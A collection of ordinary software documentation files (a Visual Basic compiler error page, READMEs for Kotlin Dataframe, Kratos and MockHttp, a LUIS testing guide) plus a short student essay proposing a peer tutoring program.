0.787535
eng_Latn
0.999918
539f5cb43bfac5760cca0cea85885e22e7b5a365
1,364
md
Markdown
docs/visual-basic/misc/bc30581.md
Graflinger/docs.de-de
9dfa50229d23e2ee67ef4047b6841991f1e40ac4
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/visual-basic/misc/bc30581.md
Graflinger/docs.de-de
9dfa50229d23e2ee67ef4047b6841991f1e40ac4
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/visual-basic/misc/bc30581.md
Graflinger/docs.de-de
9dfa50229d23e2ee67ef4047b6841991f1e40ac4
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: "'AddressOf' expression cannot be converted to '<typename>' because '<typename>' is not a delegate type"
ms.date: 07/20/2015
f1_keywords:
- vbc30581
- bc30581
helpviewer_keywords:
- BC30581
ms.assetid: 5db7589a-5456-4b3a-9d6b-93d9157f0484
ms.openlocfilehash: 80684bd3748ff7f839e5d2b8f38e488d35330201
ms.sourcegitcommit: 5c1abeec15fbddcc7dbaa729fabc1f1f29f12045
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 03/15/2019
ms.locfileid: "58029414"
---
# <a name="addressof-expression-cannot-be-converted-to-typename-because-typename-is-not-a-delegate-type"></a>'AddressOf' expression cannot be converted to '\<typename>' because '\<typename>' is not a delegate type

A statement attempts to convert an `AddressOf` expression to a type that is not a delegate type. The `AddressOf` operator creates a procedure delegate instance that refers to a specific procedure. `AddressOf` can be used as the operand of a delegate constructor, or in a context in which the type of the delegate can be determined by the compiler.

**Error ID:** BC30581

## <a name="to-correct-this-error"></a>To correct this error

- Change the target type to a delegate type.

## <a name="see-also"></a>See also

- [AddressOf Operator](../../visual-basic/language-reference/operators/addressof-operator.md)
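The page names the fix but gives no sample. As a minimal sketch (the names are invented for illustration) showing both the error and its correction:

```vb
Module Example
    Sub DoWork()
    End Sub

    Sub Main()
        ' BC30581: Object is not a delegate type.
        'Dim badHandler As Object = AddressOf DoWork

        ' Fix: assign to a delegate type instead.
        Dim handler As Action = AddressOf DoWork
        handler()
    End Sub
End Module
```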
44
274
0.772727
deu_Latn
0.913072
539fa779c1d466d16d6ad4efbeb1807171e36a42
2,039
md
Markdown
_posts/2021-11-30-Final-Project-Proposal.md
JacobSilverstein1/JacobSilverstein1.github.io
7b63762a54a9d2a80f1a3e73bb849038e4ebf21e
[ "MIT" ]
null
null
null
_posts/2021-11-30-Final-Project-Proposal.md
JacobSilverstein1/JacobSilverstein1.github.io
7b63762a54a9d2a80f1a3e73bb849038e4ebf21e
[ "MIT" ]
null
null
null
_posts/2021-11-30-Final-Project-Proposal.md
JacobSilverstein1/JacobSilverstein1.github.io
7b63762a54a9d2a80f1a3e73bb849038e4ebf21e
[ "MIT" ]
null
null
null
### Bringing HM Together

In our grade, there are large divisions between different friend groups. This is a problem because it discourages people from getting to know others that they could easily make friends with and would likely get along well with. This is evident in my FoTW observation of the library: people from different friend groups will sit in different areas, and people will often section themselves off from others by sitting in the small rooms off to the side of the main area. I find that I will often talk to those outside of my friends who are in some of my classes, but really won't try to branch out to people I don't really know in other contexts. I know that many others feel the same way. During our FoTW in the library, we observed conversations between people talking about their teachers and what they were learning in each of their classes.

I think a way that we could try to encourage people that don't know each other to meet is through a grade-wide, or even school-wide, tutoring program. This would encourage people to build relationships with others, to text or call outside of school, and it just serves as a good way for people to get to know each other. This relates to the theme of fostering community engagement because it not only helps students get to know each other better, but allows them to help each other improve at school more generally. Such a program exists with high school kids tutoring middle division kids, and this program is very successful.

Also, this program would help solve the problem that it can be very difficult to get help with classes sometimes. I know that my and many other juniors' and seniors' schedules are jam-packed, and finding time to meet with teachers for an adequate amount of time in the couple of days before a test or quiz can be difficult, or even downright impossible. This would allow students to help others in subjects in which they are stronger and get help in subjects in which they are weaker, generally helping everyone to become better at their weaker subjects.
509.75
2,012
0.804316
eng_Latn
0.999997
53a0da6897fb550e5f2571a9745caff5bf42ab02
6,055
md
Markdown
README.md
nikitinas/krangl-typed
949a8d79b016e503b3702b4184a5ae104902d91d
[ "Apache-2.0" ]
3
2020-07-01T10:06:41.000Z
2020-10-13T15:21:45.000Z
README.md
nikitinas/krangl-typed
949a8d79b016e503b3702b4184a5ae104902d91d
[ "Apache-2.0" ]
2
2020-08-20T17:04:35.000Z
2020-08-20T19:47:49.000Z
README.md
nikitinas/krangl-typed
949a8d79b016e503b3702b4184a5ae104902d91d
[ "Apache-2.0" ]
null
null
null
# Kotlin Dataframe: typesafe in-memory structured data processing for JVM

[![JetBrains incubator project](https://jb.gg/badges/incubator.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)
[![Kotlin component alpha stability](https://img.shields.io/badge/project-alpha-kotlin.svg?colorA=555555&colorB=DB3683&label=&logo=kotlin&logoColor=ffffff&logoWidth=10)](https://kotlinlang.org/docs/components-stability.html)
[![Kotlin](https://img.shields.io/badge/kotlin-1.7.0-blue.svg?logo=kotlin)](http://kotlinlang.org)
[![Maven Central](https://img.shields.io/maven-central/v/org.jetbrains.kotlinx/dataframe?color=blue&label=Maven%20Central)](https://search.maven.org/artifact/org.jetbrains.kotlinx/dataframe)
[![GitHub License](https://img.shields.io/badge/license-Apache%20License%202.0-blue.svg?style=flat)](http://www.apache.org/licenses/LICENSE-2.0)

Kotlin Dataframe aims to reconcile Kotlin's static typing with the dynamic nature of data by utilizing both the full power of the Kotlin language and the opportunities provided by intermittent code execution in Jupyter notebooks and the REPL.

* **Hierarchical** — represents hierarchical data structures, such as JSON or a tree of JVM objects.
* **Functional** — the data processing pipeline is organized in a chain of `DataFrame` transformation operations. Every operation returns a new instance of `DataFrame`, reusing the underlying storage wherever possible.
* **Readable** — data transformation operations are defined in a DSL close to natural language.
* **Practical** — provides simple solutions for common problems and the ability to perform complex tasks.
* **Minimalistic** — simple, yet powerful data model of three column kinds.
* **Interoperable** — convertible with Kotlin data classes and collections.
* **Generic** — can store objects of any type, not only numbers or strings.
* **Typesafe** — on-the-fly generation of extension properties for type safe data access with Kotlin-style care for null safety.
* **Polymorphic** — type compatibility derives from column schema compatibility. You can define a function that requires a special subset of columns in a dataframe but doesn't care about other columns.

Integrates with [Kotlin kernel for Jupyter](https://github.com/Kotlin/kotlin-jupyter). Inspired by [krangl](https://github.com/holgerbrandl/krangl), Kotlin Collections and [pandas](https://pandas.pydata.org/).

Explore the [**documentation**](https://kotlin.github.io/dataframe/overview.html) for details.

## Setup

### Gradle
```groovy
repositories {
    mavenCentral()
}
dependencies {
    implementation 'org.jetbrains.kotlinx:dataframe:0.8.0-rc-9'
}
```

### Jupyter Notebook

Install the [Kotlin kernel](https://github.com/Kotlin/kotlin-jupyter) for [Jupyter](https://jupyter.org/)

Import the stable `dataframe` version into a notebook:
```
%use dataframe
```
or a specific version:
```
%use dataframe(<version>)
```

## Data model
* `DataFrame` is a list of columns with equal sizes and distinct names.
* `DataColumn` is a named list of values. Can be one of three kinds:
  * `ValueColumn` — contains data
  * `ColumnGroup` — contains columns
  * `FrameColumn` — contains dataframes

## Usage example

**Create:**
```kotlin
// create columns
val fromTo by columnOf("LoNDon_paris", "MAdrid_miLAN", "londON_StockhOlm", "Budapest_PaRis", "Brussels_londOn")
val flightNumber by columnOf(10045.0, Double.NaN, 10065.0, Double.NaN, 10085.0)
val recentDelays by columnOf("23,47", null, "24, 43, 87", "13", "67, 32")
val airline by columnOf("KLM(!)", "{Air France} (12)", "(British Airways. )", "12. Air France", "'Swiss Air'")

// create dataframe
val df = dataFrameOf(fromTo, flightNumber, recentDelays, airline)
```

**Clean:**
```kotlin
// typed accessors for columns
// that will appear during
// dataframe transformation
val origin by column<String>()
val destination by column<String>()

val clean = df
    // fill missing flight numbers
    .fillNA { flightNumber }.with { prev()!!.flightNumber + 10 }

    // convert flight numbers to int
    .convert { flightNumber }.toInt()

    // clean 'airline' column
    .update { airline }.with { "([a-zA-Z\\s]+)".toRegex().find(it)?.value ?: "" }

    // split 'fromTo' column into 'origin' and 'destination'
    .split { fromTo }.by("_").into(origin, destination)

    // clean 'origin' and 'destination' columns
    .update { origin and destination }.with { it.lowercase().replaceFirstChar(Char::uppercase) }

    // split lists of delays in 'recentDelays' into separate columns
    // 'delay1', 'delay2'... and nest them inside original column `recentDelays`
    .split { recentDelays }.inward { "delay$it" }

    // convert string values in `delay1`, `delay2` into ints
    .parse { recentDelays }
```

**Aggregate:**
```kotlin
clean
    // group by the flight origin renamed into "from"
    .groupBy { origin named "from" }.aggregate {
        // we are in the context of single data group

        // total number of flights from origin
        count() into "count"

        // list of flight numbers
        flightNumber into "flight numbers"

        // counts of flights per airline
        airline.valueCounts() into "airlines"

        // max delay across all delays in `delay1` and `delay2`
        recentDelays.maxOrNull { delay1 and delay2 } into "major delay"

        // separate lists of recent delays for `delay1`, `delay2` and `delay3`
        recentDelays.implode(dropNulls = true) into "recent delays"

        // total delay per destination
        pivot { destination }.sum { recentDelays.intCols() } into "total delays to"
    }
```

[Try it in **Datalore**](https://datalore.jetbrains.com/view/notebook/vq5j45KWkYiSQnACA2Ymij) and explore [**more examples here**](examples).

## Code of Conduct

This project and the corresponding community are governed by the [JetBrains Open Source and Community Code of Conduct](https://confluence.jetbrains.com/display/ALL/JetBrains+Open+Source+and+Community+Code+of+Conduct). Please make sure you read it.

## License

Kotlin Dataframe is licensed under the [Apache 2.0 License](LICENSE).
44.19708
247
0.723865
eng_Latn
0.825305
53a16d62a2b82804f8cb0d5bffa7c9b1acf4b9ee
3,197
md
Markdown
README_zh.md
xushuhui/kratos
4513aecdc7f4c60b9d66d193515bf471b744ebe3
[ "MIT" ]
2
2021-06-14T07:48:48.000Z
2021-06-29T11:40:11.000Z
README_zh.md
yiwenlong/kratos
2a47af33c0037a5dab72af1340ba890818eecc7d
[ "MIT" ]
null
null
null
README_zh.md
yiwenlong/kratos
2a47af33c0037a5dab72af1340ba890818eecc7d
[ "MIT" ]
null
null
null
![kratos](docs/images/kratos.png)

[![Language](https://img.shields.io/badge/Language-Go-blue.svg)](https://golang.org/)
[![Build Status](https://github.com/go-kratos/kratos/workflows/Go/badge.svg)](https://github.com/go-kratos/kratos/actions)
[![GoDoc](https://pkg.go.dev/badge/github.com/go-kratos/kratos/v2)](https://pkg.go.dev/github.com/go-kratos/kratos/v2)
[![Go Report Card](https://goreportcard.com/badge/github.com/go-kratos/kratos)](https://goreportcard.com/report/github.com/go-kratos/kratos)
[![Discord](https://img.shields.io/discord/766619759214854164?label=chat&logo=discord)](https://discord.gg/BWzJsUJ)

Translations: [English](README.md) | [简体中文](README_zh.md)

# Kratos

Kratos is a lightweight Go microservice framework that bundles a large set of microservice-related frameworks and tools.

> The name comes from the God of War video game, which is set against the backdrop of Greek mythology and follows Kratos, a mortal who becomes the God of War and embarks on an adventure of slaying gods.

## Goals

We are committed to providing a complete microservice development experience. By integrating the relevant frameworks and tools, the microservice governance concerns become transparent to the overall business development cycle, so that teams can focus on business delivery. For every developer, the Kratos framework is also a good learning repository for studying and drawing on accumulated microservice techniques and experience.

### Principles

* Simple: no over-design; plain and simple code;
* General: provides the base-library functionality that general business development needs;
* Efficient: improves the efficiency of business iteration;
* Stable: the base libraries are highly testable with high coverage, proven safe and reliable by production practice;
* Robust: well-designed base libraries reduce misuse;
* High performance: high performance, but without hack-style optimizations made purely for performance, such as introducing unsafe;
* Extensible: well-designed interfaces make it easy to extend implementations, or to extend functionality by adding new base-library directories;
* Fault tolerant: designed for failure, drawing heavily on SRE understanding for high robustness;
* Toolchain: ships with a rich toolchain, such as cache code generation, lint tools, and so on;

## Features

* APIs: protocol communication is based on HTTP/gRPC and defined through Protobuf;
* Errors: error codes are defined as Protobuf enums, with tooling to generate the corresponding check interfaces;
* Metadata: service metadata propagation over HTTP/gRPC is normalized through middleware;
* Config: supports multiple data sources, with configuration merging and flattening, and dynamic configuration through atomic operations;
* Logger: a standard logging interface for easy integration of third-party log libraries, with log collection through fluentd;
* Metrics: a unified metrics interface that can back various metrics systems, with Prometheus integrated by default;
* Tracing: follows the OpenTelemetry specification to implement microservice distributed tracing;
* Encoding: content encoding is selected automatically based on Accept and Content-Type;
* Transport: a generic HTTP/gRPC transport layer with unified middleware plugin support;
* Registry: a unified registry interface with pluggable support for various service registries;

## Getting Started

### Required

- [go](https://golang.org/dl/)
- [protoc](https://github.com/protocolbuffers/protobuf)
- [protoc-gen-go](https://github.com/protocolbuffers/protobuf-go)

### Installing

```
go get github.com/go-kratos/kratos/cmd/kratos/v2@latest
```

### Create a service

```
# create the project template
kratos new helloworld

cd helloworld
# download project dependencies
go mod download

# generate the proto template
kratos proto add api/helloworld/helloworld.proto
# generate the proto source code
kratos proto client api/helloworld/helloworld.proto
# generate the server template
kratos proto server api/helloworld/helloworld.proto -t internal/service

# generate all proto source code, wire, etc.
go generate ./...

# build the executable
go build -o ./bin/ ./...

# run the program
./bin/helloworld -conf ./configs
```

### Kratos Boot

```
import "github.com/go-kratos/kratos/v2"
import "github.com/go-kratos/kratos/v2/transport/grpc"
import "github.com/go-kratos/kratos/v2/transport/http"

httpSrv := http.NewServer(http.Address(":8000"))
grpcSrv := grpc.NewServer(grpc.Address(":9000"))

app := kratos.New(
    kratos.Name("kratos"),
    kratos.Version("latest"),
    kratos.Server(httpSrv, grpcSrv),
)
app.Run()
```

## Related

* [Docs](https://go-kratos.dev/)
* [Examples](./examples)
* [Service Layout](https://github.com/go-kratos/kratos-layout)

## Community

* [Wechat Group](https://github.com/go-kratos/kratos/issues/682)
* [Discord Group](https://discord.gg/BWzJsUJ)
* QQ Group: 716486124

## Sponsors and Backers

![kratos](docs/images/alipay.png)

## License

Kratos is MIT licensed. See the [LICENSE](./LICENSE) file for details.
28.292035
140
0.744135
yue_Hant
0.473746
53a1a25c3d1877ad06e9be1ac460463d99643b0e
379
md
Markdown
content/posts/2020/07/my-toolkit-2018-2019.md
chumaumenze/chumaumenze
fa56c7058b7c7aca69e95b8a5907a5b1bfb38aa3
[ "MIT" ]
null
null
null
content/posts/2020/07/my-toolkit-2018-2019.md
chumaumenze/chumaumenze
fa56c7058b7c7aca69e95b8a5907a5b1bfb38aa3
[ "MIT" ]
10
2021-03-09T00:53:16.000Z
2022-02-26T09:54:06.000Z
content/posts/2020/07/my-toolkit-2018-2019.md
chumaumenze/chumaumenze
fa56c7058b7c7aca69e95b8a5907a5b1bfb38aa3
[ "MIT" ]
null
null
null
--- title: "My Toolkit (2018/2019)" published_time: 2020-07-03T23:13:45.531509 modified_time: 2020-07-03T23:13:45.531530 expiration_time: published: false category: journal tags: [] cover_image: "../../../../static/uploads/images/helloworld.gif" cover_image_caption: "Hello world HTML tag" description: "My Toolkit (2018/2019)" external_link: "" --- ## My Toolkit (2018/2019)
22.294118
63
0.728232
eng_Latn
0.119115
53a1da476206f8de190540f0d4e1edd8e4fbb7c7
1,327
md
Markdown
README.md
yuccastream/IPcam_DMS-installer
add544040b8ea40a4b9df64820bbe805b123f51f
[ "MIT" ]
1
2021-04-09T08:32:31.000Z
2021-04-09T08:32:31.000Z
README.md
yuccastream/IPcam_DMS-installer
add544040b8ea40a4b9df64820bbe805b123f51f
[ "MIT" ]
null
null
null
README.md
yuccastream/IPcam_DMS-installer
add544040b8ea40a4b9df64820bbe805b123f51f
[ "MIT" ]
null
null
null
# IPCam_DMS-installer
A simple helper script to install [IPCam_DMS](https://team.openipc.org/ipcam_dms/) on GNU/Linux

## Features:
1. Supported GNU/Linux distributions: Debian, Ubuntu, Elementary OS, Zorin OS, Linux Mint, Kali Linux, Fedora, RHEL, CentOS, IGOS Nusantara, Archlinux
2. Installs wine
3. Upgrades wine (from the distribution's repo) to a newer version (only for Fedora, RHEL, CentOS, IGN)
4. Menu entry in the application launcher
5. Latest IPCam_DMS from https://team.openipc.org/ipcam_dms/

## How to install:
Copy and paste these commands into your terminal:

1. `cd /tmp`
1. `git clone https://github.com/yuccastream/IPCam_DMS-installer.git`
1. `cd IPCam_DMS-installer`
1. `sudo ./ipcam_dms-setup install` **OR** `sudo bash ipcam_dms-setup install`

## Firewall setting:
On Fedora/CentOS/Redhat, if you experience neighbor discovery problems, open the port in the firewall

`firewall-cmd --permanent --add-port=34569/udp`

`firewall-cmd --reload`

## Icon cache in GTK-based desktops:
Optional step for GTK-based desktops, if the icon is not loaded or is loaded with the wrong size. Update the icon cache with this command:

`gtk-update-icon-cache -f -t /usr/share/icons/hicolor`

## How to remove:
If you want to remove IPCam_DMS, just run this command:

`sudo ./ipcam_dms-setup remove` **OR** `sudo bash ipcam_dms-setup remove`
37.914286
151
0.754333
eng_Latn
0.713194
53a1db454cb30c13e1f1229e372b80d6ce03f22c
10,022
md
Markdown
README.md
Salihler/mockhttp
b7b690058a8cc09fbc6f7cbea9a4809f760a536f
[ "MIT" ]
755
2015-01-07T16:56:32.000Z
2022-03-30T05:33:27.000Z
README.md
Salihler/mockhttp
b7b690058a8cc09fbc6f7cbea9a4809f760a536f
[ "MIT" ]
83
2015-01-05T22:08:34.000Z
2022-03-05T10:21:05.000Z
README.md
Salihler/mockhttp
b7b690058a8cc09fbc6f7cbea9a4809f760a536f
[ "MIT" ]
75
2015-03-27T14:13:37.000Z
2022-03-10T03:13:47.000Z
[![NuGet](http://img.shields.io/nuget/v/RichardSzalay.MockHttp.svg?style=flat-square)](https://www.nuget.org/packages/RichardSzalay.MockHttp/)[![NuGet](https://img.shields.io/nuget/dt/RichardSzalay.MockHttp.svg?style=flat-square)](https://www.nuget.org/packages/RichardSzalay.MockHttp/) [![Build status](https://ci.appveyor.com/api/projects/status/3in8hmcyg11wpcjw/branch/master?svg=true)](https://ci.appveyor.com/project/richardszalay/mockhttp)

MockHttp for HttpClient
=====================

MockHttp is a testing layer for Microsoft's HttpClient library. It allows stubbed responses to be configured for matched HTTP requests and can be used to test your application's service layer.

## NuGet

    PM> Install-Package RichardSzalay.MockHttp

## How?

MockHttp defines a replacement `HttpMessageHandler`, the engine that drives HttpClient, that provides a fluent configuration API and provides a canned response. The caller (e.g. your application's service layer) remains unaware of its presence.

## Usage

```csharp
var mockHttp = new MockHttpMessageHandler();

// Set up a response for the user API (including a wildcard in the URL)
mockHttp.When("http://localhost/api/user/*")
        .Respond("application/json", "{'name' : 'Test McGee'}"); // Respond with JSON

// Inject the handler or client into your application code
var client = mockHttp.ToHttpClient();

var response = await client.GetAsync("http://localhost/api/user/1234");
// or without async: var response = client.GetAsync("http://localhost/api/user/1234").Result;

var json = await response.Content.ReadAsStringAsync();

// No network connection required
Console.Write(json); // {'name' : 'Test McGee'}
```

### When (Backend Definitions) vs Expect (Request Expectations)

`MockHttpMessageHandler` defines both `When` and `Expect`, which can be used to define responses. They both expose the same fluent API, but each works in a slightly different way.

Using `When` specifies a "Backend Definition". Backend Definitions can be matched against multiple times and in any order, but they won't match if there are any outstanding Request Expectations present (unless `BackendDefinitionBehavior.Always` is specified). If no Request Expectations match, `Fallback` will be used.

Using `Expect` specifies a "Request Expectation". Request Expectations match only once and in the order they were added in. Only once all expectations have been satisfied will Backend Definitions be evaluated. Calling `mockHttp.VerifyNoOutstandingExpectation()` will assert that there are no expectations that have yet to be called. Calling `ResetExpectations` clears the queue of expectations.

This pattern is heavily inspired by [AngularJS's $httpBackend](https://docs.angularjs.org/api/ngMock/service/$httpBackend)

### Matchers (With*)

The `With` and `Expect` methods return a `MockedRequest`, which can have additional constraints (called matchers) placed on them before specifying a response with `Respond`.

Passing an HTTP method and URL to `When` or `Expect` is equivalent to applying a Method and Url matcher respectively.
The following chart breaks down additional built-in matchers and their usage:

| Method | Description |
| ------ | ----------- |
| <pre>WithQueryString("key", "value")<br /><br />WithQueryString("key=value&other=value")<br /><br />WithQueryString(new Dictionary&lt;string,string><br />{<br />    { "key", "value" },<br />    { "other", "value" }<br />}<br /></pre> | Matches on one or more querystring values, ignoring additional values |
| <pre>WithExactQueryString("key=value&other=value")<br /><br />WithExactQueryString(new Dictionary&lt;string,string><br />{<br />    { "key", "value" },<br />    { "other", "value" }<br />}<br /></pre> | Matches on one or more querystring values, rejecting additional values |
| <pre>WithFormData("key", "value")<br /><br />WithFormData("key=value&other=value")<br /><br />WithFormData(new Dictionary&lt;string,string><br />{<br />    { "key", "value" },<br />    { "other", "value" }<br />})<br /></pre> | Matches on one or more form data values, ignoring additional values |
| <pre>WithExactFormData("key=value&other=value")<br /><br />WithExactFormData(new Dictionary&lt;string,string><br />{<br />    { "key", "value" },<br />    { "other", "value" }<br />})<br /></pre> | Matches on one or more form data values, rejecting additional values |
| <pre>WithContent("{'name':'McGee'}")</pre> | Matches on the (post) content of the request |
| <pre>WithPartialContent("McGee")</pre> | Matches on the partial (post) content of the request |
| <pre>WithHeaders("Authorization", "Basic abcdef")<br /><br />WithHeaders(@"Authorization: Basic abcdef<br />Accept: application/json")<br /><br />WithHeaders(new Dictionary&lt;string,string><br />{<br />    { "Authorization", "Basic abcdef" },<br />    { "Accept", "application/json" }<br />})<br /></pre> | Matches on one or more HTTP header values |
| <pre>With(request => request.Content.Length > 50)</pre> | Applies custom matcher logic against an HttpRequestMessage |

These methods are chainable, making complex requirements easy to describe.

### Verifying Matches

When using Request Expectations via `Expect`, `MockHttpMessageHandler.VerifyNoOutstandingExpectation()` can be used to assert that there are no unmatched requests.

For other use cases, `GetMatchCount` will return the number of times a mocked request (returned by When / Expect) was called. This even works with `Fallback`, so you can check how many unmatched requests there were.

```csharp
var mockHttp = new MockHttpMessageHandler();

var request = mockHttp.When("http://localhost/api/user/*")
                .Respond("application/json", "{'name' : 'Test McGee'}");

var client = mockHttp.ToHttpClient();

await client.GetAsync("http://localhost/api/user/1234");
await client.GetAsync("http://localhost/api/user/2345");
await client.GetAsync("http://localhost/api/user/3456");

Console.Write(mockHttp.GetMatchCount(request)); // 3
```

### Match Behavior

Each request is evaluated using the following process:

1. If Request Expectations exist and the request matches the next expectation in the queue, the expectation is used to process the response and is then removed from the queue
2. If no Request Expectations exist, or the handler was constructed with `BackendDefinitionBehavior.Always`, the first matching Backend Definition processes the response
3. `MockHttpMessageHandler.Fallback` handles the request

### Fallback

The `Fallback` property handles all requests that weren't handled by the match behavior. Since it is also a mocked request, any of the `Respond` overloads can be applied.
```
// Unhandled requests should throw an exception
mockHttp.Fallback.Throw(new InvalidOperationException("No matching mock handler"));

// Unhandled requests should be executed against the network
mockHttp.Fallback.Respond(new HttpClient());
```

The default fallback behavior is to return an empty response with the status `404 No matching mock handler for "GET http://host/url"`.

### Examples

This example uses Expect to test an OAuth ticket recycle process:

```csharp
// Simulate an expired token
mockHttp.Expect("/users/me")
        .WithQueryString("access_token", "old_token")
        .Respond(HttpStatusCode.Unauthorized);

// Expect the request to refresh the token and supply a new one
mockHttp.Expect("/tokens/refresh")
        .WithFormData("refresh_token", "refresh_token")
        .Respond("application/json", "{'access_token' : 'new_token', 'refresh_token' : 'new_refresh'}");

// Expect the original call to be retried with the new token
mockHttp.Expect("/users/me")
        .WithQueryString("access_token", "new_token")
        .Respond("application/json", "{'name' : 'Test McGee'}");

var httpClient = mockHttp.ToHttpClient();

var userService = new UserService(httpClient);
var user = await userService.GetUserDetails();

Assert.Equals("Test McGee", user.Name);

mockHttp.VerifyNoOutstandingExpectation();
```

## Platform Support

MockHttp is compiled for .NET Standard 2.0, .NET Standard 1.1, .NET 4, and .NET 4.5, as well as a Portable Class Library (Profile 328) supporting:

* .NET 4
* Silverlight 5
* Windows 8
* Windows Phone Silverlight 8
* Windows Phone 8.1
* Xamarin iOS
* Xamarin Android

## Build / Release

Clone the repository and build `RichardSzalay.MockHttp.sln` using MSBuild. NuGet package restore must be enabled.

To release, build:

```
msbuild Release.proj /p:PackageVersion=1.2.3
```

If you fork the project, simply rename the `nuspec` file accordingly and it will be picked up by the release script.

## Contributors

Many thanks to all the members of the community that have contributed PRs to this project:

* [jozefizso](https://github.com/jozefizso)
* [camiller2](https://github.com/camiller2)
* [wislon](https://github.com/wislon)
* [coryflucas](https://github.com/coryflucas)
* [esskar](https://github.com/esskar)
* [jericho](https://github.com/jericho)

## License

The MIT License (MIT)

Copyright (c) 2018 Richard Szalay

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
50.11
398
0.744861
eng_Latn
0.785136
53a20556355c9ff71105f1d38fea5ad03494cc23
6,373
md
Markdown
articles/cognitive-services/LUIS/luis-concept-devops-testing.md
Yueying-Liu/mc-docs.zh-cn
21000ea687a4cda18cecf10e9183fd2172918bb5
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cognitive-services/LUIS/luis-concept-devops-testing.md
Yueying-Liu/mc-docs.zh-cn
21000ea687a4cda18cecf10e9183fd2172918bb5
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cognitive-services/LUIS/luis-concept-devops-testing.md
Yueying-Liu/mc-docs.zh-cn
21000ea687a4cda18cecf10e9183fd2172918bb5
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: DevOps testing for LUIS apps
description: How to test a Language Understanding (LUIS) app in a DevOps environment.
ms.service: cognitive-services
ms.subservice: language-understanding
ms.topic: conceptual
ms.date: 10/19/2020
ms.author: v-johya
ms.openlocfilehash: 36ed67cc5f41a247e75ca37fe22ba66af0890722
ms.sourcegitcommit: 537d52cb783892b14eb9b33cf29874ffedebbfe3
ms.translationtype: HT
ms.contentlocale: zh-CN
ms.lasthandoff: 10/23/2020
ms.locfileid: "92472484"
---
# <a name="testing-for-luis-devops"></a>Testing for LUIS DevOps

Software engineers who are developing a Language Understanding (LUIS) app can apply DevOps practices around [source control](luis-concept-devops-sourcecontrol.md), [automated builds](luis-concept-devops-automation.md), [testing](luis-concept-devops-testing.md), and [release management](luis-concept-devops-automation.md#release-management) by following these guidelines.

In agile software development methodologies, testing plays an integral role in building quality software. Every significant change to a LUIS app should be accompanied by tests designed to exercise the new functionality the developer is building into the app. These tests are checked into your source code repository along with the `.lu` source of your LUIS app. The implementation of the change is finished when the app satisfies the tests.

Tests are a critical part of [CI/CD workflows](luis-concept-devops-automation.md). When changes to a LUIS app are proposed in a pull request (PR), or after changes are merged into your main branch, CI workflows should run the tests to verify that the updates haven't caused any regressions.

## <a name="how-to-do-unit-testing-and-batch-testing"></a>How to do unit testing and batch testing

There are two different kinds of testing for a LUIS app that you need to perform in continuous integration workflows:

- **Unit tests** - Relatively simple tests that verify the key functionality of your LUIS app. A unit test passes when the expected intent and the expected entities are returned for a given test utterance. All unit tests must pass for the test run to complete successfully. This kind of testing is similar to the [interactive testing](/cognitive-services/luis/luis-concept-test) you can do in the [LUIS portal](https://luis.azure.cn/).
- **Batch tests** - A batch test is a comprehensive test of the currently trained model that measures its performance. Unlike unit tests, a batch test is not pass/fail testing. The expectation is not that every test will return the expected intent and expected entities. Instead, a batch test helps you view the accuracy of each intent and entity in your app and helps you compare over time as you make improvements. This kind of testing is the same as the [batch testing](/cognitive-services/luis/luis-concept-batch-test) you can perform interactively in the LUIS portal.

You can employ unit testing from the beginning of your project. Batch testing is only really of value once you've developed the schema of your LUIS app and you're working on improving its accuracy.

For both unit tests and batch tests, make sure that your test utterances are kept separate from your training utterances. If you test on the data you used for training, you'll get the false impression that your app is performing extremely well when it is simply overfitting to the test data. Tests must be unseen by the model to test how well it generalizes.

### <a name="writing-tests"></a>Writing tests

When you write a set of tests, for each test you need to define:

* The test utterance
* The expected intent
* The expected entities.

Use the LUIS [batch file syntax](/cognitive-services/luis/luis-concept-batch-test#batch-syntax-template-for-intents-with-entities) to define a group of tests in a JSON-formatted file. For example:

```JSON
[
  {
    "text": "example utterance goes here",
    "intent": "intent name goes here",
    "entities": [
      {
        "entity": "entity name 1 goes here",
        "startPos": 14,
        "endPos": 23
      },
      {
        "entity": "entity name 2 goes here",
        "startPos": 14,
        "endPos": 23
      }
    ]
  }
]
```

Some test tools, such as [NLU.DevOps](https://github.com/microsoft/NLU.DevOps), also support test files in LUDown format.

#### <a name="designing-unit-tests"></a>Designing unit tests

Unit tests should be designed to test the core functionality of your LUIS app. In each iteration, or sprint, of your app development, you should write a sufficient number of tests to verify that the key functionality you implemented in that iteration is working correctly.

In each unit test, for a given test utterance, you can:

* Test that the correct intent is returned
* Test that the "key" entities, those that are critical to your solution, are returned
* Test that the [prediction score](/cognitive-services/luis/luis-concept-prediction-score) for the intent and entities exceeds a threshold you define. For example, you could decide to consider a test as passed only when the prediction score for the intent and for your key entities exceeds 0.75.

In unit tests, it's a good idea to test that your key entities are returned in the prediction response, but to ignore any false positives. False positives are entities that are found in the prediction response but that are not defined in the expected results for your test. Ignoring false positives makes authoring unit tests less onerous, while still allowing you to focus on testing that the data that is critical to your solution is returned in the prediction response.

> [!TIP]
> The [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) tool supports all your LUIS testing needs. The `compare` command, when used in [unit test mode](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md#unit-test-mode), will assert that all tests pass, and will ignore false-positive results for entities that are not labeled in the expected results.

